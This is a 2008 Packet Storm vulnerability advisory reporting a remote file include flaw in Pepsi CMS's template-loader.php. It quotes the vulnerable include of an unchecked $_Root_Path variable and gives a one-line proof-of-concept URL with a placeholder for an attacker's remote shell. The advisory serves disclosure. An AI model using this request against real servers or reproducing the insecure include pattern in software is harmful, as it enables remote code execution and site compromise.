pepsicms-rfi.txt

2008-08-01T00:00:00
ID PACKETSTORM:68733
Type packetstorm
Reporter Rohit Bansal
Modified 2008-08-01T00:00:00

Description

                                        
                                            `Dear Packetstormsecurity !  
  
I found Vulnerability in Pepsi CMS  
here is the description  
=======================================  
<http://docs.google.com/Doc?id=dgq3x7pn_1026z464gw>Pepsi CMS  
(template-loader.php) Remote File Include  
=======================================  
  
*::Home:  
  
* http://sourceforge.net/projects/pepsicms/  
*  
::Vuln Type :  
  
* Remote File Include (RFI)  
  
*::Discovered by :  
  
* Rohit Bansal  
  
  
*::Vuln Code:  
  
*/includes/template-loader.php  
  
include( 'config.php' );  
include( 'db.php' );  
//include( 'classes/theme_engine/engine.php' );  
include( $_Root_Path . 'classes/Smarty.class.php' );  
  
  
*PoC:  
  
*/includes/template-loader.php?_Root_Path=[SHELL]??  
  
Greetz: whizgeeks, infysec  
  
=============================================  
  
I hope You will post that Vulnerability in "Vulnerability section"  
Tell me if I need to change something.  
  
Thanks and Regards  
Rohit Bansal  
`